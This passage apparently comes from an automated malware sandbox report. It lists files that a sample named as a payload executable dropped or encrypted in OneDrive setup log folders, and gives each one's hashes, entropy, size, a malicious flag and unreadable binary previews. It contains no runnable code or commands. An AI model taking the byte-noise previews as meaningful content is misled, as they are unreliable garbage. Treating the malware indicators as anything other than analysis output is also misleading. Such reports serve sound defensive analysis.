                                                                                                                          MD5:D323FCD19AAABC97F8CB24305ABACDF7
                                                                                                                          SHA1:2037E9C3C14BA81D7011D1CE53D3A2A3EF8A1565
                                                                                                                          SHA-256:0DED473F6902ADEDB2112CF3FCDADE651346D4B2464EE8CD650AC43B9312F834
                                                                                                                          SHA-512:7202308307DE37FAE5B8DF0BF7CCEDBCC62420C3A9C4C749FDEB764E67DD6A8D1768C4061503AB8BB22EBA7B8CB0D8F01C76D20DF61DB3D2959F94F7E3E5C3E3
                                                                                                                          Malicious:false
                                                                                                                          Preview:EBFGO..U..=...B.....x.../.4 ..sr...5l...e....~..d..R......&C.%.T%.q-R......lwL.6v...H.M...E..@@.NU..'!.T0.\...x<czu.j.N1.c..i.`Z.....Z.O.......q.HT...htM.#=D,7\.y#..T.}c*.t.hz...c......w0I....u..9....W.........#3U......C.;..Z.~.:..cW..*{............b.[. 8%..............I.o..D.7..... .3.!~I,rx.l...9k2Z..$...+h:.Zl.!.A..(.\.<.dU@.@..v;..X.L....Y.b...a.....5.N.P."@...$...T.3..n=...m...V..5.... ..d.6.j..d...X.*..j%.i..t.r.d.............X..c.o.Ht.H.T..4.f..C.`=......7F."...q\.b/X.yiI.."..i!..#..GL3..C.7Di..S\..[5.(.R.F..s..^.."...B.!.5-.$......5L.ia......L....~..+.f..Z.r....4^F.......)......8_..RmmDq.:. . ..&...Xvb... .....g..|5I...k3~....#.v.$D..7..c..#..&o.R.;#.v.x@1.....P....4.{.....}j"c..[..W@..`...W..).;=P...0.A..K8.V..yk..5..".m.....h@.bm.....W.\+:.j...H.RJ<len7.......9~..u..q.A`./ctj."`...d.?..H...A...%..r...{.H....yc9...A_.c.../`5.`.n....#..T..t..%b.....+}B.*.....7.:.U..p...Pp.{..w .......Zg2........O.ot..].w.+.H..Sp...R.....]?..tZ.P.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-2023-10-03.1150.4240.1.aodl

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):65536
                                                                                                                          Entropy (8bit):1.2777036245475641
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:xPIxkds3oB0fNrGcl46ZPCNDaZjJTjlxPCBsnGkPUtlek8UNPfzjUOrIE5BWdJeY:xPIcs3xXAaZjxltQblb82fzjUsF5Buo
                                                                                                                          MD5:2F5184451E9C1E6E81A4EE51FC554177
                                                                                                                          SHA1:2935F0D64498A4C360BBAE26C8AEEF226318681A
                                                                                                                          SHA-256:E14C6E3631EDDC8B70BF62EC29E5D6BC2C975EC1A1C64286F2CDA8D45C8FD455
                                                                                                                          SHA-512:4D7BB8329B4F56E2549421570E45FDC29DAE062A232F9BEBB3EE357642CE2E7F06BB741DD1D57B4FC785962F5EAF4097A0185169D48845F99C2EF4EC268F957B
                                                                                                                          Malicious:false
                                                                                                                          Preview:EBFGO.a#.mb.........1n.B..9K....)$.n......v.4..YM..4N.y.Ig...]V..j6.../V.......mv.@..5.GB\...*.[+.Gv=3.....[.'.....m.UPW.FZ..;c6g.4,....^..TB..|..@.i.)G.....c..^.7d..P..V..D..@...7...;....V.Y.....8r.....%.n[7.>..<...nM..6J.\{.}[J..Rh..E......mi...!V.B...on.8.........5O'.&v.,..f..n.c>..F.P...'..*...W.1.......u].-Lg...%.n.e.....'m4...o(...;D.....4.R7.....<..A.5.6TOS.h8.y. .....L>B..>...K6..W..9........E....h}F.Yy.V...c...N..z.q."...,t.<n..L.....%.....,...?...1../u]u.;I...x.+....1..?.@.....X<q....Af.u.A.&N.|...m..G.sG.u.wf.K.....P...6R...u..].O.o...G,........Z.#....jFdg....6 .......P.>.b.~%...r......t..l....q..}.s.T.zI;.Z..."Zf...oG....(F...>6X.t.`.0....s62..BM.R.."...:..h........G..o...)v."...c..h~V....'[......... mx.......c....BmJE.........o..h..oo.....$....v#Tk.7..8v].1.4......`.hv....r..W.....<.......Q..!..h..Jf....c."..n..!....vr..}.Es...b.y.....J....?...7B.[...`V.oX.4..|`..`..g.........P...=W.v........}..w...|A..W4.O...=.....A.....FB5...6

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-2023-10-03.1150.4240.1.odl

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):65536
                                                                                                                          Entropy (8bit):2.895927499774119
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:+ApYAvWMqVdgvI2N+RocY98ypaxpk3iWsKxNe7HjFR:dYAvC3+j+RocY98ypaxCEK2
                                                                                                                          MD5:9C53B139A307DA437386C4719007940C
                                                                                                                          SHA1:DBF0347A3ECBEFDC7A13FDB30BF062EC1323BC95
                                                                                                                          SHA-256:6A04EC5389DCBA3C9A570239A771485B21DD33304EFCE57721E5DF7A218EDCA5
                                                                                                                          SHA-512:C1A0B747DA896C3D49163DE3C0F575EBD09CB3DCACF3514EA27E21C72ACBBBDBF642FEF4EB4D56279CF1B83E6831C373C7FD4ADA89EA47D66A3308F561C4B404
                                                                                                                          Malicious:false
                                                                                                                          Preview:EBFGOS.d7.?.%.N.G.>TW.E.Q.J.f@....../.\.)......Z..<..;.i..f..?z..Y{D.E...I.....kL.....y....=.E..k....^?.^.VW.pn.....).U...SL....X.5.[..`.....~..<....N..l..k.oRRB..v.....6...I<.Gfp....Z.....Z.g.%n.!^...G.'$.<...A>G.n....x./.LE1_a..........T.TBL.h.=5R.M..$..g.. .&.SC.Bk\.^.5#X.+?.b;.......md.[.......hd\..`..n..A.K.J..om....y&..B*.k..........U.~..No..a.+..s...W.....7|..0W.V...H..%...v.2..a4Y...\...S~..X..TCz.z..&$QA..@>..^"....Y.XG....B..i_..K.\.~v.&VJ1...'&&._._.(I...V.@..C2d.(..}.hb...]......N...WBU._..4(....z:,(....d-Hgk..d..=...........gbjf...4..vc.....x-.....^.F..m0d..r...x..;k.~...jh..\.<[rO..@@."v. ....x.^s5@C..(U%.q.._.r...J..AN.Bd.d5.\....R>.$s.Kf.e.ci..+..5S....*N..V..........G.3...b.....~SL^.IB%..Ez...D..7...R.d#.'.d.$...~..lw%R..u..c..ti2qs..u...hx..#.j'j.`}o...m.....pb..)..-.]5...............S.....tO.?(.q..7.>y.i]..F...w,h7.'.......e...y...m0..g.{.h!.....^....H.jBS........q.l..?...j......Gr.-.96...@.U..w.2.'-.og.>\.y......5.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser-2023-10-03.1149.344.1.aodl

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):65536
                                                                                                                          Entropy (8bit):1.0102416719130665
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:JRkXG1vs9JYUJHNKitExiPkBABzsX3Aarj/MHXQ/184YE8Th0HXlj:J8GW9JlOkeAFsXQarj/MHgd84ch03l
                                                                                                                          MD5:136D0FDB39EBA40F5F613DDCC169EBBA
                                                                                                                          SHA1:B79DD59F1DC448435BC5968A77CAE09A69D94A49
                                                                                                                          SHA-256:766141680CCCB9EBCBBA98448EA40361BD005A41E8B6F1E70B5AE63514191A12
                                                                                                                          SHA-512:0EA33569465A7132A2436DC99F12502C751EC100BBA9C59C6910D7829FECB2732008B302A9ECBEB39BF52760B0A9B0FFC2C78BAA83F57CC2BE21F91594A6729E
                                                                                                                          Malicious:false
                                                                                                                          Preview:EBFGO...X.U........Z.....~.......MOip..n..[....Xk'....J.R.Kxf?....])..r.y.uZqJ.<..7Sy..>^..........@.....q.r.A...3.j#B...Y.y....?.Z......s.....yWwy...8.-.....%.M...H6.o..*?.I..@_ .N.?.Z@.........U.*s.]B.5.".9.6e]...h...2...............B.-d4.8...&.5..Q..]x.N...Ee....D.=....vW....`....,....%..M._.4..fc.k/c.?!1m.^.wSza.A..h.f..jg3...X.}....E...V..O....6.U..vI....".0...A^...-x=r..d7q.\..k4..y1U....bQ0.n.....A..._.+..=.3|....1/.4..)..b.{o...{F.S.,.....lVh.s.h.l...*..-8.)H._.n......'...s..P.z....!....,.].R"q.... k~#JRO3.&.{tf.....<.t..o.e.{.....s.4..)5..#..].....D..FA...;.iL.i ....`t....D\g..U.....Ch.....dF[..$.L.VKICtf.7X..:..@...i...Be.M3..4..`......H|In.63+*,.S?.l;h.c.M.i.`..7?G..m....8...eGCEN...+'4.O-U...fr-Gd.|.N.."+..N....3......X....>5u..V.~....[`...b.......r........*.TM<..j0..j..0?Q.,..p..k.@..bv.......].....E..U?TC....{.. +...[...[h[~P......;.....z...(M...72%H.....r...R...6.......4?......34..%2....'=..]...f2....N.[.Ad.V...m....q.."

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser-2023-10-03.1149.344.1.odl

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):65536
                                                                                                                          Entropy (8bit):0.20538790269225907
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:9s0ZckxjkoYgMn/feVSHtp/s4rBiFI76vl4rzEMwbz:BZJNBYn/XHbbgE2WGz
                                                                                                                          MD5:788899E6BB290CD43C49EEA602BC2C1F
                                                                                                                          SHA1:20CE5F081EB7242738F9C4F996EBA7ED42330E7E
                                                                                                                          SHA-256:10399487BC76135306C484E9591404BEB5EB9C0346AFE7358D0065D439323CD4
                                                                                                                          SHA-512:70D4567A1C7223F3D4D43431565E7614D9E1CAEEB2A086C6ECF2D964F7C70F37BAA39FA3ED704216D9463E6AC2F10BF98E84492E9A0760B6CE28F4B1D6554AD4
                                                                                                                          Malicious:false
                                                                                                                          Preview:EBFGO...$.*..Y...`9$..cl..-. ...[....3.?.5......7...P....m..B.Q.^..Z.O..~.F....~....]..` fo.9'.H|Y..%.D..E...pv....j4. .*o......I.G........8.d..y4...9...r..z4.N..;.....AK.J._......p.0T9K...../j.t"[..W..-.:....0.k.........|.....{...r76rre../.T.L..~..~......h..U.H..a7%?2.C._aR.2nH.Yo.Lf..$.. .*....i....i.B.}..d.|.:@....5.\4..a../..............-~..J..~p.TV.j@..l'V.uD....P.u\E.M.:......m.....z...}l.r..CFC.1.L..4H ......d".u......"..{...........~.].....C.9q~.4.........QS..w..y~. ?.#lj.e..{.AV.'5i>.GD......#...O G...C./(.l....Z.J.R?.TK+Q.~A[S...b.Z.%...t....w...A......G....wC.....-u;%..HE.*..#C..-i9|...8.L..+..LZ..Ro...*Rz..g..]7..q..4u..g.7.!..|p.|X.L.......*M!u..]R!r.....y.-W+.#x.t2..O....P..m..[(.:p..R.o.....T.L.bm7LV..........i.:...Z.E...."8....B\.Gs..ha.y. ...phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}........................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser-2023-10-03.1150.9064.1.aodl

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):65536
                                                                                                                          Entropy (8bit):4.688509248656495
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:I/IDHEdwO5Pz2zguiSnfkoQzWz5t6bHgB4iJt:QwNQz2zgvWiQ6+4o
                                                                                                                          MD5:0337AD0651C99CBFEAA8601938FACBD4
                                                                                                                          SHA1:DDBF3245D3756E27D27B121B2E9A7991AC6B0D06
                                                                                                                          SHA-256:11EDDE575F73E93F5B7CB46988E3B6584B6A377FDF21395EA4033E412215C428
                                                                                                                          SHA-512:C06D68A86C5B19A9059DD8BDE6AD597B89BCA196C5A6E3FA029FE0FEF93E8C1579833383246D29B8325C29B87483A1AD1A849D0C1B58698BE010430851509E12
                                                                                                                          Malicious:false
                                                                                                                          Preview:EBFGO.u.rl..]@V...q.H..&..K....q.J.? .S...;mw^..5.f...........!.O......D.=,Cd.Ky.B.[..)...FA...u..'~1..-?....i..!.Q=...S/.........l./M.....\w..J...TKQM.....Wa...(.Kq*o...z......_.).......Sa@.fe/Nr......%.^..vk..r...4..Qu...&/.*...^.....S.P .../..6_.+0.7.1.f..B;.o.@..}.`....}.......)......N..1...ZV.....uw.....m...].....~p.`u..N.*./..@"g..Do...D.....o.:.`5|.D~L...7...p.......z......6...7/@..%...z...4.~....XV.e`..`T\.f..e.r.A.z..7...#SK..J].b..h.../5..)...qhqoz+.D..CL.D....-..j|....J-..N.5`....Y..Z..bhz.E2^:..m.CG.........p..`x.J.ehA..U.Y.;.g..^.w.... ..+..KW.d.jG.O8.)H...t$....IxK..l{@.p.ZP.+...`....6.....7.L....~H..YM.`R7..i......n...^..R...#3..."..sB.i.i.).?...'.UK...g...L.v:h..d......U.E?.j<..{.......{.n..x.c.v_...PVH......K.d.......>...L...K..."kI.....^....f..[...../......t.G#'?.,......>.[.,....k.4.s.iW...>.........a....$..s...7zv.=...:K...0x...k..Sj.......H.K.....[....D..&..[_K.*.........j..DD..WMc.Sj..?...)X......P....Xr..QI.Sx.#.. ..?.].....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser-2023-10-03.1150.9064.1.odl

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):65536
                                                                                                                          Entropy (8bit):0.27130408094641834
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:NbOQmjKcujCHchScHHjLsIlztty/nE6Dr0BDk2NxGbz:NbfuchSc0IxkkDk2DUz
                                                                                                                          MD5:E8B91827C57288BD4E4F557CF1E3BC90
                                                                                                                          SHA1:5D584EAC05EF64BB214DC260977ABE0AEF028609
                                                                                                                          SHA-256:3C4930F95DBEC38400E5CC405463CDA889D6E12E7677B17BD8459D80F92B113F
                                                                                                                          SHA-512:837B0C831E1A9944A3F83EA24EE21042E3B56E445AE2DA8042EB21EA724FD5B28B88E2EEEFDE7A6C23DB441C6F0231232E04937BF015F90D7649A02CA2B4ECEB
                                                                                                                          Malicious:false
                                                                                                                          Preview:EBFGOO.<..O..$z9..).Z|om.}...E.>..@.!.I.e_.F2.....7?.......w.>&.66.Bu.*..~.D.Z..uc.t..z.uHg[."..|_O.}...t..5...a...%...|.....VR.....e.H..^..Bh.....([..."...Iw..W.....nD.)#.* .......c..o.7.,......g.E...0.~T..0..L...}....ay.....:...".g.|`...A.g.2j..8.I.e.7..... ..Q.cTF..`............@ %>.6n..;.;....xYo..w.......x..e.&2?[......c...{.B...E4....7...H.s.......r..]...?..N..J....)..I.A.....TK......f.5zD....T.C..k.....>u!.H.V.t....E[.._.`7...@..)n*.......h....E.]A1...M.V.p.J'.;.%....kp.m..f.?... .2......`. .7..!...U...("..V.=....D.F...w.Qw.}.T$[U.... .P....."...O.1...a.CF..*....L]....v..5..X..*2.?...c(?.4.......%.)+.E........O......_..C9...I57]u...$..]V....y.......D.....wf.5.jPrS.%..D...4.|.m....#5.....05.G.c`fr."}/...x%...R....h./....u..4.ej.FP.....-6.@...)Z..".X.Yh.nc.#;.MI~(." ......U...*=r....(........-H<..5....~.....l$.."..s.t4J.....JJ...."\.....>M.n..D..Z[...O...4.Ka0..}...,.b/.v6u.e.....&.5Y.~O.)...v.*/-. ....9pUq..q.............._1=.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser_2023-10-03_114938_158-b2c.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):131072
                                                                                                                          Entropy (8bit):7.912269178021292
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:7QW2+ECZa6qPhZDG4wiBjmy/WQ4tPKzzYIt/XSdRb0yCRs:75jZLq2cBCy/34ti9/idR3Cq
                                                                                                                          MD5:E366BA4ED9A66BFCCF6DF557F511A330
                                                                                                                          SHA1:D3D6AF8336AF19E6E3F5E5530759C0227436B938
                                                                                                                          SHA-256:1063E94C8866BD5CBF2449EC14EE8884C9D23C10952060BE1C4CFAB3831F7EE8
                                                                                                                          SHA-512:75913ED7D78C316A90D69E6F7FBB87E208392FE05F063E1007E12649AEBC93CECC0408189C71BD6F41417B92A0042A1CF5E89539DF6127B16575E29D883E1BC8
                                                                                                                          Malicious:false
                                                                                                                          Preview:1.0./~..g.B.I..?...$./.I.....c....i. .{.B...U.0B1iSI%......w...<o.tO..V...E9Y..W?.N..K.{q..a.\=.=..(....J.C......?S..*.W.....@i.5K...N..Dg....sQ.3V..yp...+|.v..u'.*.`e..y.n..t0..=C80m.rdC.m..>.G...I...=%...x......M...K.....g+..A^I.8.T..W<W...{.[.........Lup.<N{.."^.`.y...Q.3..zF.u.....K#hsu.....e.....&N._H.=...1y..lY..4...e..7]dvf2.K..8.. ....=.Rk$5.k..&Y.3..@Y.....a.9.;.w...q7.1|.8.!ic.rV.n.......>.zE9.}...Z..Hf....m...b.......)...........ybc..X.n*.l..R.2.[.Q...6......xD .&.!..a,....zJ.|.f-.....?.Z.....?=2...q.U......^.T...b...z....4e...!.2....p..s..F.2.\...........J.w..<.......jc.F...>Ad.7.~....>.eLt...z.6......A.x*.......)f.GY...Y[...B.....c..F0.oO.......Jy.E..4G.?.&.]..i.q.Z../...$.g.k=jY.D....}h..h..S.J..A4.\.=...O..`u.W......xO.t..)=..].z.......w..qF..|....2.?.n.jA...s..F.s.s.....?.i...... Ly.V....dr..s0.Y.m.qA. .X...&.jSx..)4...0.Fj..... .7.Y...T.\.......w....+.'P_.a.o..2|.i3v....u._..m.j.]...?...kl....R...R...x....[3.....#.X..U/

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser_2023-10-03_115005_9064-2616.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):262144
                                                                                                                          Entropy (8bit):6.793071026341724
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:+wvSCG1eedxbpHSwQDPrrpGSxh7m5SM119BXdGaKC6ktN:+waCaCwQD/ISx9m5NH5F6
                                                                                                                          MD5:D986298828EFCC4EAB8DB50E383D2891
                                                                                                                          SHA1:FCC13D9BBAE87CA9C65247BC4E300AF1DEAC2844
                                                                                                                          SHA-256:329DDE92814A1F7FABDEAC2A306C891633EBF87F36D4F51624D05AD6C1B4EF28
                                                                                                                          SHA-512:0B7A7D17B460D940E7F70F23EACC6EA5176C4E61AD86715BFC39BF2BE0574C75E599BEDFE50C43BBB7904D7648D725BBFF3485EE5C9EF3DF744AF06E1D949837
                                                                                                                          Malicious:false
                                                                                                                          Preview:1.0./*...}~.@lh~Q^....\............|.VU...Q.....9.....*{..<..@.^.......wNKZ.M...9......V1fL.`..QE.3..."+f3}.."%..O_.;....u..g.. |) )y...l.kq..M.....Qs..2...H.}o1..C!..;N?5.....wl.p....HJ.Jv....U.=l....v....&12.}KwL.............tU....K..)..-..,..b.../..dO.m...%.....n...fZh.DtuK.F..&w.R...q^.$.w. Yg......0.M...(..*..4f9f.h_z....q...k.G...a$.KK.J.....rS.........^...xRC7.X<../.?.....M... .G.R.>.j..&.\...+....<...&%.o...J0;....s...(..bA..=y.2:.E....g.>..J..Y....s..cKn.!.i...89V.l.....-...&..&...c..Fj...Z......./......~..N..v..#`o.P..q.+.....P...I....@.j.l.]1...QK%.dj,...u..7...g]e.K..........'F.3..}#.&.4.G7f...?...!.(....X.+_..B..R.K.I....lR....A.......x......?0.vY.....a....O....z.6r.X.bn|.c.V. ..>O-y...U...t.....8Y..dU......q^."=../)..................R...IQ.p.0...km..2.8.o.....!....[...Y.......SL.?vc!^._9...P .^..Y.K.E..Y..3@pn..wv...p..b..\. F.lW...v.+.n.)..c..[.....#.E....b...bYSk....w.i....U...F.7.9...<...*D...,..<...%..>o..$.._.....b1Z.N.S2...:...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser_2023-10-04_093243_16a0-1d8c.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):131072
                                                                                                                          Entropy (8bit):6.650733804372877
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:Zkv6T5W3edjoFGDFQ0ZFeCu29/Ik4vtY2wQypM/jQxJAzPuP2ypwwgS8:V5WUjqqjbep2KkcYBvYscuP2y1gS
                                                                                                                          MD5:86060325F9CCA0141FB78D38F58226F4
                                                                                                                          SHA1:6D6940AD57D9C83ACF163C6469E5EED16A895858
                                                                                                                          SHA-256:339A6D409E951B5130180D62B164E126BDC2625DD611CCBC66510334BE59517D
                                                                                                                          SHA-512:2F3CFE183DFDB90D0860BA4994A227F3B61627E9366060C410E6BF5305CF101E1D47B3E04DAE60A3C2A81630624409B3D1254E3CAAE7992D03CF99A9485E86D0
                                                                                                                          Malicious:false
                                                                                                                          Preview:1.0./.md.)..V...4\.._*.\Dp..Gxi.m`tu.b..4.s.]r.U>.mG...=....O:./...1...V......E..5T..;..{..B....B)C..C..nZ..........ov..l.-..=l.!0.{..N.;....FW.&.d........;.D<.#"..p{..........r.z.@.[....|.O....L)n..Km........b.i.v.P..p.A&&.L..C.k...:).^[#) ..y.gL..A...r.X..n'..ye..\.[..u&#!..5....gs.X.j..q.;...V.*..0......{..S)c.A..X...6Y......4.......T5q/N..E2}.z.F.9....,..."./4N.q<.nPK.e.5.H~<8D.L....|...h...u4A.......4.i..wW.....?}.L.......D.asZy..4q...$i'!,.Y.....a.X8".._.0.0......P....* ..DxZm.U..}~....9...l...5.TDh...../......d.,k.s.[...._8.........N.:.2....^..1t ..Q.i.......IH.od...N5~8H.FVB..).Em..........r.....W4..V....V1..s..1.q........^.e....2...Rad-....j.).ZK.\~nY.+..aj.x]...<...<...VE}...0.vF$6_.}....[7k.,.!:9..;..x...~?j.}...).i7.(..gLQ.H.....b8l....d...2.@@.m..zQ....y..!..$.T...uen..H).VtQ..^D.)....F...'B..*3l.j..pc9...C.d..6.|..$Q...Ns...m0...IKG.H.........Y.M..g..H.|.R.p...q..C...Y...{........@>*I.!...[.).`#....B........o.....X....R.I....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2023-10-03_114932_b84-2220.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):30630
                                                                                                                          Entropy (8bit):7.993126331911247
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:CaTkNoeSiFOpQ8vNAsQLwdEOqlDCxFpYIP:CaTkWUFOy0qsvdTlx8IP
                                                                                                                          MD5:3FC4DDE932B494240C14E5D51F80B409
                                                                                                                          SHA1:6C5748FA8F07AC08AD4383BD3CFDC0302C2E0CE5
                                                                                                                          SHA-256:2AE2C61D78C949923D4300352DF92C4E251C971A1FA11407278730B1D5FDA4D5
                                                                                                                          SHA-512:61325A14A14271242D05230A569ADB69039693FAFB549223867ACBAF3FA19BD46AACE883581251090CF35F9F42357B37B4F366605D76F07B093AE392CFF97578
                                                                                                                          Malicious:true
                                                                                                                          Preview:1.0./.e^..l...p.E.b5/.w2........7..'.........]....U...$.a. .C..?....SQ...g.sa.%....r0.6..g...>...B...TOv.....OK....{H....!`bMw,.....z..s.r1tyq......Xi...4....S.....j.ev$.SL.*+A....4.YG...?Z.x.V.Ge.c... ..*..!$L%?..Z*.@.C...~...........N.....Y!~....u.*...m.{...\..%f\v.r."....*#.vik.`@.p.....EC."..w..K.wS...v.^...*W.m.,...y.....L**(%1.....8...V...fg.{...J.`...............E..E.,k...7....`..D....J.....^.r.4.YK..(.....+..n...^wCHH...s4..Le....D.S.......u.lu...aD......v`0_.`}.$.f...b.Rr\5.s{R.._...........[.._l.eL.T./!.....ue....K...`{..}[,$.Qo(....%8B^.@...9....L.....5....]R'.^|%E.. ..q@.Y..#.b....~.y..D ..tD...rX.|go t..6'.*.r.._.2..g6...W..V.~W...X.I...A<......8.d...iY.Zb.F./b..!8.G......!..T*..=O.C.e*.z.....:......9......h.[V..g. .....O.7.p...P@......<M.F.'...h...$..89B+....5..@Xm..I......u..%_....N...c.j.e..f#..>..)S=..|;.,Z..'...p..........hU`..cj.m'..........9.>.-.u(.+..lQ....Y..'..-...{..;...^.....#....n.O....F$9.v..a.j.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2023-10-03_115005_4240-5892.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):65536
                                                                                                                          Entropy (8bit):4.499430032513837
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:bp/rsrW+v9Yipa3UsBWlO1rqK7lJEaGDGZqABibsu+2n1i9Wc:Rsv9J2HclA2SUbjWW
                                                                                                                          MD5:48884B28CA3654C5E9B54FE7B46BD1F2
                                                                                                                          SHA1:2D2B23442AD2849103B387E328F5D12A19FA1A56
                                                                                                                          SHA-256:ED43891FB6231E9A325CE5B9C18F89F6BCE4A0A2FE3626E15C50480AC5F31CA8
                                                                                                                          SHA-512:C5658D68FDDD91450384BF9D41463949B05130BF8D6C7DD3B3B777EFE8273B3DC70904307E10013FDA36BA515749FD602D1A1132604578361ED9FA13547BB05D
                                                                                                                          Malicious:false
                                                                                                                          Preview:1.0./.&T..Y..=.z.A.(..$.h-.5A2@..&@zN....(.0.x..4H.....;kK....d:~.hZE.;.....V.Z4....+...^...........|.c.x....._tQ..>d.@_.)R ......Q..?...{.T....i.,..D..2.D.t..e'.G...1.|f.^...O..L....{..%.I..3..."....t...k}>....\.'....B41S.z..Y..&$....{..W..z....q...Z+...F....O7.1...I..#.....^+.e.\t..>mF...z*!C.......n.Z....#Y....]....6..5SK...G..lF.5}KCw....T....%.&.:.4...!g.z.,K,.s.Dz..[.j...t.xD..v.0..=56...">$.-.[...;.@.....:.....qm.`.....}....Q*>:....I.../...y0n..4....-...${.._N... .h.I.....6N......@..:...A\.. ..U...Ih.k.[.<..5O'.M.1:..P.iPe.#2u ...,&..;%...#.f...7..w^..1.%..RQ.e1....p..d.O........O...M.m.....dl2...d...1~......<.)...9M.F~<A..4v..N...h3.j.i.$. hy|..n.M....y)v.....a*..X^o...j.Q.m..A.\...n.o....5..!`ty.....q.D...Q...QW...)W...P.!,...9|d..G...eK..w.......'...{..IDCv..yHZ1.2..e.z....f.5H$w.EC.!...q....."L.M.gn$..V...n.....R.0.!..Pm.-.G.:..H..#..VB...Xz.}....-...y..d.._d..9......j....M.>]........7.~.lW4....:>....X..TMo.U1....E.x..(./.o

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2023-10-04_093243_14f4-1074.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):131072
                                                                                                                          Entropy (8bit):6.628123688737761
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:mk8RDbgX68Ot+qoA89kjiSQrg0owetKg7nvpC1T4JuHmM:mkm+4Y5BuGhrg0/etj7nxmTjm
                                                                                                                          MD5:2581EB61ECBAF6FA8ACC26C09FA2F486
                                                                                                                          SHA1:D7270A2142D49EBE5515EB0930DD59E6A9298527
                                                                                                                          SHA-256:197A6BCB09F09E0DB6922734A1D3511165D3810D8755AA3D2EDF188CDE5AD7B3
                                                                                                                          SHA-512:E1B7C5C13185D71D197D3E198966FF271F7D6CAC653FC401EC4F74AE923A82648A2D6F9F38360D5F51936F3294163063E8FBD865F54A77430B50758B30B9AED2
                                                                                                                          Malicious:false
